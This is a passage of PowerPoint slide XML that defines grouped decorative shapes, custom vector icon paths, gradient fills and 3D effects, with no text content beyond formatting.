                    <a:gd name="T4" fmla="+- 0 10791 197"/>
                    <a:gd name="T5" fmla="*/ T4 w 21188"/>
                    <a:gd name="T6" fmla="+- 0 10794 193"/>
                    <a:gd name="T7" fmla="*/ 10794 h 21203"/>
                    <a:gd name="T8" fmla="+- 0 10791 197"/>
                    <a:gd name="T9" fmla="*/ T8 w 21188"/>
                    <a:gd name="T10" fmla="+- 0 10794 193"/>
                    <a:gd name="T11" fmla="*/ 10794 h 21203"/>
                    <a:gd name="T12" fmla="+- 0 10791 197"/>
                    <a:gd name="T13" fmla="*/ T12 w 21188"/>
                    <a:gd name="T14" fmla="+- 0 10794 193"/>
                    <a:gd name="T15" fmla="*/ 10794 h 21203"/>
                  </a:gdLst>
                  <a:ahLst/>
                  <a:cxnLst>
                    <a:cxn ang="0">
                      <a:pos x="T1" y="T3"/>
                    </a:cxn>
                    <a:cxn ang="0">
                      <a:pos x="T5" y="T7"/>
                    </a:cxn>
                    <a:cxn ang="0">
                      <a:pos x="T9" y="T11"/>
                    </a:cxn>
                    <a:cxn ang="0">
                      <a:pos x="T13" y="T15"/>
                    </a:cxn>
                  </a:cxnLst>
                  <a:rect l="0" t="0" r="r" b="b"/>
                  <a:pathLst>
                    <a:path w="21188" h="21203">
                      <a:moveTo>
                        <a:pt x="17615" y="468"/>
                      </a:moveTo>
                      <a:lnTo>
                        <a:pt x="17606" y="468"/>
                      </a:lnTo>
                      <a:cubicBezTo>
                        <a:pt x="14870" y="2476"/>
                        <a:pt x="12200" y="4590"/>
                        <a:pt x="9727" y="6958"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="7348" y="9227"/>
                        <a:pt x="5200" y="11619"/>
                        <a:pt x="3329" y="14060"/>
                      </a:cubicBezTo>
                      <a:lnTo>
                        <a:pt x="341" y="17962"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="350" y="17970"/>
                      </a:lnTo>
                      <a:cubicBezTo>
                        <a:pt x="-197" y="18786"/>
                        <a:pt x="-106" y="19880"/>
                        <a:pt x="638" y="20590"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="1491" y="21407"/>
                        <a:pt x="2889" y="21407"/>
                        <a:pt x="3746" y="20590"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="3877" y="20460"/>
                        <a:pt x="3984" y="20321"/>
                        <a:pt x="4069" y="20174"/>
                      </a:cubicBezTo>
                      <a:lnTo>
                        <a:pt x="6867" y="16517"/>
                      </a:lnTo>
                      <a:cubicBezTo>
                        <a:pt x="8601" y="14255"/>
                        <a:pt x="10606" y="12027"/>
                        <a:pt x="12824" y="9913"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="15281" y="7570"/>
                        <a:pt x="17557" y="5758"/>
                        <a:pt x="20329" y="3749"/>
                      </a:cubicBezTo>
                      <a:lnTo>
                        <a:pt x="20321" y="3741"/>
                      </a:lnTo>
                      <a:cubicBezTo>
                        <a:pt x="20400" y="3684"/>
                        <a:pt x="20473" y="3635"/>
                        <a:pt x="20543" y="3570"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="21402" y="2753"/>
                        <a:pt x="21402" y="1427"/>
                        <a:pt x="20543" y="606"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="19742" y="-161"/>
                        <a:pt x="18472" y="-193"/>
                        <a:pt x="17615" y="468"/>
                      </a:cubicBezTo>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16" name="AutoShape 55"/>
                <p:cNvSpPr/>
                <p:nvPr/>
              </p:nvSpPr>
              <p:spPr bwMode="auto">
                <a:xfrm>
                  <a:off x="8448675" y="2649538"/>
                  <a:ext cx="71438" cy="74613"/>
                </a:xfrm>
                <a:custGeom>
                  <a:avLst/>
                  <a:gdLst>
                    <a:gd name="T0" fmla="+- 0 10803 213"/>
                    <a:gd name="T1" fmla="*/ T0 w 21180"/>
                    <a:gd name="T2" fmla="+- 0 10801 203"/>
                    <a:gd name="T3" fmla="*/ 10801 h 21196"/>
                    <a:gd name="T4" fmla="+- 0 10803 213"/>
                    <a:gd name="T5" fmla="*/ T4 w 21180"/>
                    <a:gd name="T6" fmla="+- 0 10801 203"/>
                    <a:gd name="T7" fmla="*/ 10801 h 21196"/>
                    <a:gd name="T8" fmla="+- 0 10803 213"/>
                    <a:gd name="T9" fmla="*/ T8 w 21180"/>
                    <a:gd name="T10" fmla="+- 0 10801 203"/>
                    <a:gd name="T11" fmla="*/ 10801 h 21196"/>
                    <a:gd name="T12" fmla="+- 0 10803 213"/>
                    <a:gd name="T13" fmla="*/ T12 w 21180"/>
                    <a:gd name="T14" fmla="+- 0 10801 203"/>
                    <a:gd name="T15" fmla="*/ 10801 h 21196"/>
                  </a:gdLst>
                  <a:ahLst/>
                  <a:cxnLst>
                    <a:cxn ang="0">
                      <a:pos x="T1" y="T3"/>
                    </a:cxn>
                    <a:cxn ang="0">
                      <a:pos x="T5" y="T7"/>
                    </a:cxn>
                    <a:cxn ang="0">
                      <a:pos x="T9" y="T11"/>
                    </a:cxn>
                    <a:cxn ang="0">
                      <a:pos x="T13" y="T15"/>
                    </a:cxn>
                  </a:cxnLst>
                  <a:rect l="0" t="0" r="r" b="b"/>
                  <a:pathLst>
                    <a:path w="21180" h="21196">
                      <a:moveTo>
                        <a:pt x="8372" y="11356"/>
                      </a:moveTo>
                      <a:cubicBezTo>
                        <a:pt x="6122" y="13508"/>
                        <a:pt x="3675" y="15444"/>
                        <a:pt x="1144" y="17292"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="963" y="17388"/>
                        <a:pt x="786" y="17493"/>
                        <a:pt x="637" y="17645"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="-213" y="18457"/>
                        <a:pt x="-213" y="19774"/>
                        <a:pt x="637" y="20585"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="1464" y="21380"/>
                        <a:pt x="2796" y="21397"/>
                        <a:pt x="3652" y="20641"/>
                      </a:cubicBezTo>
                      <a:lnTo>
                        <a:pt x="3665" y="20649"/>
                      </a:lnTo>
                      <a:cubicBezTo>
                        <a:pt x="6364" y="18673"/>
                        <a:pt x="8988" y="16581"/>
                        <a:pt x="11419" y="14263"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="13759" y="12030"/>
                        <a:pt x="15873" y="9685"/>
                        <a:pt x="17715" y="7283"/>
                      </a:cubicBezTo>
                      <a:lnTo>
                        <a:pt x="20663" y="3427"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="20654" y="3419"/>
                      </a:lnTo>
                      <a:cubicBezTo>
                        <a:pt x="21386" y="2600"/>
                        <a:pt x="21357" y="1379"/>
                        <a:pt x="20541" y="608"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="19697" y="-203"/>
                        <a:pt x="18323" y="-203"/>
                        <a:pt x="17468" y="608"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="17313" y="760"/>
                        <a:pt x="17197" y="937"/>
                        <a:pt x="17094" y="1114"/>
                      </a:cubicBezTo>
                      <a:lnTo>
                        <a:pt x="14228" y="4857"/>
                      </a:lnTo>
                      <a:cubicBezTo>
                        <a:pt x="12526" y="7090"/>
                        <a:pt x="10552" y="9275"/>
                        <a:pt x="8372" y="11356"/>
                      </a:cubicBezTo>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grpSp>
          <p:nvGrpSpPr>
            <p:cNvPr id="25" name="Group 26"/>
            <p:cNvGrpSpPr/>
            <p:nvPr/>
          </p:nvGrpSpPr>
          <p:grpSpPr>
            <a:xfrm>
              <a:off x="5338" y="2772"/>
              <a:ext cx="2054" cy="3672"/>
              <a:chOff x="5960997" y="2484779"/>
              <a:chExt cx="1304471" cy="2341845"/>
            </a:xfrm>
          </p:grpSpPr>
          <p:grpSp>
            <p:nvGrpSpPr>
              <p:cNvPr id="26" name="Group 27"/>
              <p:cNvGrpSpPr/>
              <p:nvPr/>
            </p:nvGrpSpPr>
            <p:grpSpPr>
              <a:xfrm>
                <a:off x="5960997" y="2484779"/>
                <a:ext cx="1304471" cy="2341845"/>
                <a:chOff x="5960997" y="2484779"/>
                <a:chExt cx="1304471" cy="2341845"/>
              </a:xfrm>
            </p:grpSpPr>
            <p:grpSp>
              <p:nvGrpSpPr>
                <p:cNvPr id="28" name="Group 29"/>
                <p:cNvGrpSpPr>
                  <a:grpSpLocks noChangeAspect="1"/>
                </p:cNvGrpSpPr>
                <p:nvPr/>
              </p:nvGrpSpPr>
              <p:grpSpPr bwMode="auto">
                <a:xfrm>
                  <a:off x="5960997" y="2484779"/>
                  <a:ext cx="1304471" cy="1802479"/>
                  <a:chOff x="3149600" y="2480384"/>
                  <a:chExt cx="1201204" cy="1660005"/>
                </a:xfrm>
              </p:grpSpPr>
              <p:sp>
                <p:nvSpPr>
                  <p:cNvPr id="30" name="等腰三角形 51"/>
                  <p:cNvSpPr/>
                  <p:nvPr/>
                </p:nvSpPr>
                <p:spPr>
                  <a:xfrm flipV="1">
                    <a:off x="3149600" y="3200883"/>
                    <a:ext cx="1201204" cy="939506"/>
                  </a:xfrm>
                  <a:prstGeom prst="triangle">
                    <a:avLst/>
                  </a:prstGeom>
                  <a:gradFill>
                    <a:gsLst>
                      <a:gs pos="0">
                        <a:schemeClr val="accent3"/>
                      </a:gs>
                      <a:gs pos="100000">
                        <a:srgbClr val="EEECE1">
                          <a:lumMod val="90000"/>
                          <a:alpha val="0"/>
                        </a:srgbClr>
                      </a:gs>
                    </a:gsLst>
                    <a:lin ang="5400000" scaled="0"/>
                  </a:gradFill>
                  <a:ln w="25400" cap="flat" cmpd="sng" algn="ctr">
                    <a:noFill/>
                    <a:prstDash val="solid"/>
                  </a:ln>
                  <a:effectLst/>
                </p:spPr>
                <p:txBody>
                  <a:bodyPr anchor="ctr"/>
                  <a:lstStyle/>
                  <a:p>
                    <a:pPr algn="ctr" eaLnBrk="1" fontAlgn="auto" hangingPunct="1">
                      <a:spcBef>
                        <a:spcPts val="0"/>
                      </a:spcBef>
                      <a:spcAft>
                        <a:spcPts val="0"/>
                      </a:spcAft>
                      <a:defRPr/>
                    </a:pPr>
                    <a:endParaRPr lang="zh-CN" altLang="en-US" kern="0" dirty="0">
                      <a:solidFill>
                        <a:sysClr val="window" lastClr="FFFFFF"/>
                      </a:solidFill>
                      <a:latin typeface="Calibri" panose="020F0502020204030204"/>
                      <a:ea typeface="微软雅黑 Light" panose="020B0502040204020203" pitchFamily="34" charset="-122"/>
                    </a:endParaRPr>
                  </a:p>
                </p:txBody>
              </p:sp>
              <p:sp>
                <p:nvSpPr>
                  <p:cNvPr id="31" name="矩形 52"/>
                  <p:cNvSpPr/>
                  <p:nvPr/>
                </p:nvSpPr>
                <p:spPr>
                  <a:xfrm>
                    <a:off x="3630724" y="2480384"/>
                    <a:ext cx="720080" cy="720080"/>
                  </a:xfrm>
                  <a:prstGeom prst="rect">
                    <a:avLst/>
                  </a:prstGeom>
                  <a:solidFill>
                    <a:schemeClr val="accent3"/>
                  </a:solidFill>
                  <a:ln w="9525" cap="flat" cmpd="sng" algn="ctr">
                    <a:noFill/>
                    <a:prstDash val="solid"/>
                  </a:ln>
                  <a:effectLst>
                    <a:outerShdw blurRad="40000" dist="23000" dir="5400000" rotWithShape="0">
                      <a:srgbClr val="000000">
                        <a:alpha val="35000"/>
                      </a:srgbClr>
                    </a:outerShdw>
                  </a:effectLst>
                  <a:scene3d>
                    <a:camera prst="isometricOffAxis2Top">
                      <a:rot lat="19390491" lon="18812960" rev="21592509"/>
                    </a:camera>
                    <a:lightRig rig="chilly" dir="t">
                      <a:rot lat="0" lon="0" rev="600000"/>
                    </a:lightRig>
                  </a:scene3d>
                  <a:sp3d extrusionH="666750"/>
                </p:spPr>
                <p:txBody>
                  <a:bodyPr anchor="ctr"/>
                  <a:lstStyle/>
                  <a:p>
                    <a:pPr algn="ctr" eaLnBrk="1" fontAlgn="auto" hangingPunct="1">
                      <a:spcBef>
                        <a:spcPts val="0"/>
                      </a:spcBef>
                      <a:spcAft>
                        <a:spcPts val="0"/>
                      </a:spcAft>
                      <a:defRPr/>
                    </a:pPr>
                    <a:endParaRPr lang="zh-CN" altLang="en-US" kern="0" dirty="0">
                      <a:solidFill>
                        <a:sysClr val="window" lastClr="FFFFFF"/>
                      </a:solidFill>
                      <a:latin typeface="Calibri" panose="020F0502020204030204"/>
                      <a:ea typeface="微软雅黑 Light" panose="020B0502040204020203" pitchFamily="34" charset="-122"/>
                    </a:endParaRPr>
                  </a:p>
                </p:txBody>
              </p:sp>
            </p:grpSp>
            <p:sp>
              <p:nvSpPr>
                <p:cNvPr id="29" name="Oval 30"/>
                <p:cNvSpPr>
                  <a:spLocks noChangeAspect="1"/>
                </p:cNvSpPr>
                <p:nvPr/>
              </p:nvSpPr>
              <p:spPr>
                <a:xfrm>
                  <a:off x="6312532" y="4240732"/>
                  <a:ext cx="585892" cy="585892"/>
                </a:xfrm>
                <a:prstGeom prst="ellipse">
                  <a:avLst/>
                </a:prstGeom>
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:ln w="3810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id-ID"/>
                </a:p>
              </p:txBody>
            </p:sp>
          </p:grpSp>
          <p:sp>
            <p:nvSpPr>
              <p:cNvPr id="27" name="AutoShape 112"/>
              <p:cNvSpPr/>
              <p:nvPr/>
            </p:nvSpPr>
            <p:spPr bwMode="auto">
              <a:xfrm>
                <a:off x="6453017" y="4367800"/>
                <a:ext cx="328308" cy="328869"/>
              </a:xfrm>
              <a:custGeom>
                <a:avLst/>
                <a:gdLst>
                  <a:gd name="T0" fmla="*/ 10510 w 21020"/>
                  <a:gd name="T1" fmla="*/ 10800 h 21600"/>
                  <a:gd name="T2" fmla="*/ 10510 w 21020"/>
                  <a:gd name="T3" fmla="*/ 10800 h 21600"/>
                  <a:gd name="T4" fmla="*/ 10510 w 21020"/>
                  <a:gd name="T5" fmla="*/ 10800 h 21600"/>
                  <a:gd name="T6" fmla="*/ 10510 w 21020"/>
                  <a:gd name="T7" fmla="*/ 10800 h 21600"/>
                </a:gdLst>
                <a:ahLst/>
                <a:cxnLst>
                  <a:cxn ang="0">
                    <a:pos x="T0" y="T1"/>
                  </a:cxn>
                  <a:cxn ang="0">
                    <a:pos x="T2" y="T3"/>
                  </a:cxn>
                  <a:cxn ang="0">
                    <a:pos x="T4" y="T5"/>
                  </a:cxn>
                  <a:cxn ang="0">
                    <a:pos x="T6" y="T7"/>
                  </a:cxn>
                </a:cxnLst>
                <a:rect l="0" t="0" r="r" b="b"/>
                <a:pathLst>
                  <a:path w="21020" h="21600">
                    <a:moveTo>
                      <a:pt x="18846" y="7946"/>
                    </a:moveTo>
                    <a:lnTo>
                      <a:pt x="17740" y="9091"/>
                    </a:lnTo>
                    <a:cubicBezTo>
                      <a:pt x="17740" y="8939"/>
                      <a:pt x="17758" y="8792"/>
                      <a:pt x="17744" y="8636"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="17629" y="7331"/>
                      <a:pt x="17036" y="6068"/>
                      <a:pt x="16074" y="5080"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="15004" y="3980"/>
                      <a:pt x="13585" y="3348"/>
                      <a:pt x="12180" y="3345"/>
                    </a:cubicBezTo>
                    <a:lnTo>
                      <a:pt x="13268" y="2218"/>
                    </a:lnTo>
                    <a:cubicBezTo>
                      <a:pt x="13812" y="1659"/>
                      <a:pt x="14572" y="1350"/>
                      <a:pt x="15403" y="1350"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="16460" y="1350"/>
                      <a:pt x="17546" y="1840"/>
                      <a:pt x="18381" y="2696"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="19165" y="3500"/>
                      <a:pt x="19631" y="4499"/>
                      <a:pt x="19698" y="5510"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="19760" y="6453"/>
                      <a:pt x="19457" y="7317"/>
                      <a:pt x="18846" y="7946"/>
                    </a:cubicBezTo>
                    <a:moveTo>
                      <a:pt x="5828" y="19329"/>
                    </a:moveTo>
                    <a:cubicBezTo>
                      <a:pt x="5813" y="18424"/>
                      <a:pt x="5454" y="17481"/>
                      <a:pt x="4730" y="16739"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="4046" y="16034"/>
                      <a:pt x="3150" y="15628"/>
                      <a:pt x="2257" y="15592"/>
                    </a:cubicBezTo>
                    <a:lnTo>
                      <a:pt x="2911" y="13157"/>
                    </a:lnTo>
                    <a:cubicBezTo>
                      <a:pt x="2959" y="12995"/>
                      <a:pt x="3052" y="12835"/>
                      <a:pt x="3168" y="12695"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="4485" y="11726"/>
                      <a:pt x="6512" y="12012"/>
                      <a:pt x="7920" y="13460"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="9409" y="14990"/>
                      <a:pt x="9639" y="17230"/>
                      <a:pt x="8492" y="18568"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="8416" y="18609"/>
                      <a:pt x="8339" y="18648"/>
                      <a:pt x="8256" y="18675"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="8256" y="18675"/>
                      <a:pt x="5828" y="19329"/>
                      <a:pt x="5828" y="19329"/>
                    </a:cubicBezTo>
                    <a:close/>
                    <a:moveTo>
                      <a:pt x="2737" y="20164"/>
                    </a:moveTo>
                    <a:cubicBezTo>
                      <a:pt x="2665" y="20181"/>
                      <a:pt x="2443" y="20239"/>
                      <a:pt x="2291" y="20249"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="1751" y="20244"/>
                      <a:pt x="1313" y="19792"/>
                      <a:pt x="1313" y="19237"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="1321" y="19124"/>
                      <a:pt x="1365" y="18929"/>
                      <a:pt x="1380" y="18857"/>
                    </a:cubicBezTo>
                    <a:lnTo>
                      <a:pt x="2071" y="16283"/>
                    </a:lnTo>
                    <a:cubicBezTo>
                      <a:pt x="2822" y="16261"/>
                      <a:pt x="3630" y="16562"/>
                      <a:pt x="4265" y="17215"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="4911" y="17878"/>
                      <a:pt x="5214" y="18725"/>
                      <a:pt x="5181" y="19504"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="5181" y="19504"/>
                      <a:pt x="2737" y="20164"/>
                      <a:pt x="2737" y="20164"/>
                    </a:cubicBezTo>
                    <a:close/>
                    <a:moveTo>
                      <a:pt x="6888" y="11179"/>
                    </a:moveTo>
                    <a:cubicBezTo>
                      <a:pt x="6280" y="10927"/>
                      <a:pt x="5642" y="10783"/>
                      <a:pt x="5004" y="10774"/>
                    </a:cubicBezTo>
                    <a:lnTo>
                      <a:pt x="10063" y="5536"/>
                    </a:lnTo>
                    <a:cubicBezTo>
                      <a:pt x="10838" y="4759"/>
                      <a:pt x="11966" y="4536"/>
                      <a:pt x="13077" y="4819"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="13077" y="4819"/>
                      <a:pt x="6888" y="11179"/>
                      <a:pt x="6888" y="11179"/>
                    </a:cubicBezTo>
                    <a:close/>
                    <a:moveTo>
                      <a:pt x="9717" y="13672"/>
                    </a:moveTo>
                    <a:cubicBezTo>
                      <a:pt x="9473" y="13258"/>
                      <a:pt x="9194" y="12859"/>
                      <a:pt x="8848" y="12505"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="8447" y="12093"/>
                      <a:pt x="7986" y="11770"/>
                      <a:pt x="7507" y="11498"/>
                    </a:cubicBezTo>
                    <a:lnTo>
                      <a:pt x="13767" y="5064"/>
                    </a:lnTo>
                    <a:cubicBezTo>
                      <a:pt x="14259" y="5288"/>
                      <a:pt x="14729" y="5607"/>
                      <a:pt x="15145" y="6035"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="15500" y="6398"/>
                      <a:pt x="15775" y="6806"/>
                      <a:pt x="15987" y="7229"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="15987" y="7229"/>
                      <a:pt x="9717" y="13672"/>
                      <a:pt x="9717" y="13672"/>
                    </a:cubicBezTo>
                    <a:close/>
                    <a:moveTo>
                      <a:pt x="10519" y="16061"/>
                    </a:moveTo>
                    <a:cubicBezTo>
                      <a:pt x="10465" y="15452"/>
                      <a:pt x="10298" y="14854"/>
                      <a:pt x="10047" y="14288"/>
                    </a:cubicBezTo>
                    <a:lnTo>
                      <a:pt x="16257" y="7906"/>
                    </a:lnTo>
                    <a:cubicBezTo>
                      <a:pt x="16637" y="9140"/>
                      <a:pt x="16442" y="10429"/>
                      <a:pt x="15610" y="11284"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="15604" y="11290"/>
                      <a:pt x="15598" y="11293"/>
                      <a:pt x="15593" y="11298"/>
                    </a:cubicBezTo>
                    <a:lnTo>
                      <a:pt x="15602" y="11306"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="10525" y="16565"/>
                    </a:lnTo>
                    <a:cubicBezTo>
                      <a:pt x="10527" y="16397"/>
                      <a:pt x="10534" y="16232"/>
                      <a:pt x="10519" y="16061"/>
                    </a:cubicBezTo>
                    <a:moveTo>
                      <a:pt x="19308" y="1741"/>
                    </a:moveTo>
                    <a:cubicBezTo>
                      <a:pt x="18228" y="632"/>
                      <a:pt x="16805" y="0"/>
                      <a:pt x="15403" y="0"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="14220" y="0"/>
                      <a:pt x="13131" y="450"/>
                      <a:pt x="12335" y="1266"/>
                    </a:cubicBezTo>
                    <a:lnTo>
                      <a:pt x="9138" y="4577"/>
                    </a:lnTo>
                    <a:cubicBezTo>
                      <a:pt x="9129" y="4585"/>
                      <a:pt x="9118" y="4592"/>
                      <a:pt x="9108" y="4602"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="9103" y="4608"/>
                      <a:pt x="9100" y="4614"/>
                      <a:pt x="9095" y="4620"/>
                    </a:cubicBezTo>
                    <a:lnTo>
                      <a:pt x="9096" y="4621"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="2310" y="11647"/>
                    </a:lnTo>
                    <a:cubicBezTo>
                      <a:pt x="1998" y="11966"/>
                      <a:pt x="1771" y="12364"/>
                      <a:pt x="1645" y="12797"/>
                    </a:cubicBezTo>
                    <a:lnTo>
                      <a:pt x="102" y="18541"/>
                    </a:lnTo>
                    <a:cubicBezTo>
                      <a:pt x="100" y="18557"/>
                      <a:pt x="0" y="19008"/>
                      <a:pt x="0" y="19237"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="0" y="20541"/>
                      <a:pt x="1030" y="21599"/>
                      <a:pt x="2302" y="21599"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="2554" y="21599"/>
                      <a:pt x="3044" y="21475"/>
                      <a:pt x="3062" y="21473"/>
                    </a:cubicBezTo>
                    <a:lnTo>
                      <a:pt x="8630" y="19969"/>
                    </a:lnTo>
                    <a:cubicBezTo>
                      <a:pt x="9054" y="19839"/>
                      <a:pt x="9439" y="19604"/>
                      <a:pt x="9750" y="19283"/>
                    </a:cubicBezTo>
                    <a:lnTo>
                      <a:pt x="19776" y="8899"/>
                    </a:lnTo>
                    <a:cubicBezTo>
                      <a:pt x="21600" y="7023"/>
                      <a:pt x="21394" y="3881"/>
                      <a:pt x="19308" y="1741"/>
                    </a:cubicBezTo>
                  </a:path>
                </a:pathLst>
              </a:custGeom>
              <a:solidFill>
                <a:schemeClr val="accent3"/>
              </a:solid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nvGrpSpPr>
            <p:cNvPr id="32" name="Group 33"/>
            <p:cNvGrpSpPr/>
            <p:nvPr/>
          </p:nvGrpSpPr>
          <p:grpSpPr>
            <a:xfrm>
              <a:off x="2750" y="2772"/>
              <a:ext cx="2054" cy="3712"/>
              <a:chOff x="3269603" y="2494718"/>
              <a:chExt cx="1304471" cy="2340121"/>
            </a:xfrm>
          </p:grpSpPr>
          <p:grpSp>
            <p:nvGrpSpPr>
              <p:cNvPr id="33" name="Group 34"/>
              <p:cNvGrpSpPr>
                <a:grpSpLocks noChangeAspect="1"/>
              </p:cNvGrpSpPr>
              <p:nvPr/>
            </p:nvGrpSpPr>
            <p:grpSpPr bwMode="auto">
              <a:xfrm>
                <a:off x="3269603" y="2494718"/>
                <a:ext cx="1304471" cy="1802479"/>
                <a:chOff x="3149600" y="2480384"/>
                <a:chExt cx="1201204" cy="1660005"/>
              </a:xfrm>
            </p:grpSpPr>
            <p:sp>
              <p:nvSpPr>
                <p:cNvPr id="38" name="等腰三角形 51"/>
                <p:cNvSpPr/>
                <p:nvPr/>
              </p:nvSpPr>
              <p:spPr>
                <a:xfrm flipV="1">
                  <a:off x="3149600" y="3200883"/>
                  <a:ext cx="1201204" cy="939506"/>
                </a:xfrm>
                <a:prstGeom prst="triangle">
                  <a:avLst/>
                </a:prstGeom>
                <a:gradFill>
                  <a:gsLst>
                    <a:gs pos="0">
                      <a:schemeClr val="accent2"/>
                    </a:gs>
                    <a:gs pos="100000">
                      <a:srgbClr val="EEECE1">
                        <a:lumMod val="90000"/>
                        <a:alpha val="0"/>
                      </a:srgbClr>
                    </a:gs>
                  </a:gsLst>
                  <a:lin ang="5400000" scaled="0"/>
                </a:gradFill>
                <a:ln w="25400" cap="flat" cmpd="sng" algn="ctr">
                  <a:noFill/>
                  <a:prstDash val="solid"/>
                </a:ln>
                <a:effectLst/>
              </p:spPr>
              <p:txBody>
                <a:bodyPr anchor="ctr"/>
                <a:lstStyle/>
                <a:p>
                  <a:pPr algn="ctr" eaLnBrk="1" fontAlgn="auto" hangingPunct="1">
                    <a:spcBef>
                      <a:spcPts val="0"/>
                    </a:spcBef>
                    <a:spcAft>
                      <a:spcPts val="0"/>
                    </a:spcAft>
                    <a:defRPr/>
                  </a:pPr>
                  <a:endParaRPr lang="zh-CN" altLang="en-US" kern="0" dirty="0">
                    <a:solidFill>
                      <a:sysClr val="window" lastClr="FFFFFF"/>
                    </a:solidFill>
                    <a:latin typeface="Calibri" panose="020F0502020204030204"/>
                    <a:ea typeface="微软雅黑 Light" panose="020B0502040204020203" pitchFamily="34" charset="-122"/>
                  </a:endParaRPr>
                </a:p>
              </p:txBody>
            </p:sp>
            <p:sp>
              <p:nvSpPr>
                <p:cNvPr id="39" name="矩形 52"/>
                <p:cNvSpPr/>
                <p:nvPr/>
              </p:nvSpPr>
              <p:spPr>
                <a:xfrm>
                  <a:off x="3630724" y="2480384"/>
                  <a:ext cx="720080" cy="720080"/>
                </a:xfrm>
                <a:prstGeom prst="rect">
                  <a:avLst/>
                </a:prstGeom>
                <a:solidFill>
                  <a:schemeClr val="accent2"/>
                </a:solidFill>
                <a:ln w="9525" cap="flat" cmpd="sng" algn="ctr">
                  <a:noFill/>
                  <a:prstDash val="solid"/>
                </a:ln>
                <a:effectLst>
                  <a:outerShdw blurRad="40000" dist="23000" dir="5400000" rotWithShape="0">
                    <a:srgbClr val="000000">
                      <a:alpha val="35000"/>
                    </a:srgbClr>
                  </a:outerShdw>
                </a:effectLst>
                <a:scene3d>
                  <a:camera prst="isometricOffAxis2Top">
                    <a:rot lat="19390491" lon="18812960" rev="21592509"/>
                  </a:camera>
                  <a:lightRig rig="chilly" dir="t">
                    <a:rot lat="0" lon="0" rev="600000"/>
                  </a:lightRig>
                </a:scene3d>
                <a:sp3d extrusionH="666750"/>
              </p:spPr>
              <p:txBody>
                <a:bodyPr anchor="ctr"/>
                <a:lstStyle/>
                <a:p>
                  <a:pPr algn="ctr" eaLnBrk="1" fontAlgn="auto" hangingPunct="1">
                    <a:spcBef>
                      <a:spcPts val="0"/>
                    </a:spcBef>
                    <a:spcAft>
                      <a:spcPts val="0"/>
                    </a:spcAft>
                    <a:defRPr/>
                  </a:pPr>
                  <a:endParaRPr lang="zh-CN" altLang="en-US" kern="0" dirty="0">
                    <a:solidFill>
                      <a:sysClr val="window" lastClr="FFFFFF"/>
                    </a:solidFill>
                    <a:latin typeface="Calibri" panose="020F0502020204030204"/>
                    <a:ea typeface="微软雅黑 Light" panose="020B0502040204020203" pitchFamily="34" charset="-122"/>
                  </a:endParaRPr>
                </a:p>
              </p:txBody>
            </p:sp>
          </p:grpSp>
          <p:sp>
            <p:nvSpPr>
              <p:cNvPr id="34" name="Oval 35"/>
              <p:cNvSpPr>
                <a:spLocks noChangeAspect="1"/>
              </p:cNvSpPr>
              <p:nvPr/>
            </p:nvSpPr>
            <p:spPr>
              <a:xfrm>
                <a:off x="3628031" y="4248947"/>
                <a:ext cx="585892" cy="585892"/>
              </a:xfrm>
              <a:prstGeom prst="ellipse">
                <a:avLst/>
              </a:prstGeom>
              <a:solidFill>
                <a:schemeClr val="bg1"/>
              </a:solidFill>
              <a:ln w="381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id-ID"/>
              </a:p>
            </p:txBody>
          </p:sp>
          <p:grpSp>
            <p:nvGrpSpPr>
              <p:cNvPr id="35" name="Group 36"/>
              <p:cNvGrpSpPr/>
              <p:nvPr/>
            </p:nvGrpSpPr>
            <p:grpSpPr>
              <a:xfrm>
                <a:off x="3754948" y="4377739"/>
                <a:ext cx="328308" cy="328308"/>
                <a:chOff x="3498967" y="3049909"/>
                <a:chExt cx="464344" cy="464344"/>
              </a:xfrm>
              <a:solidFill>
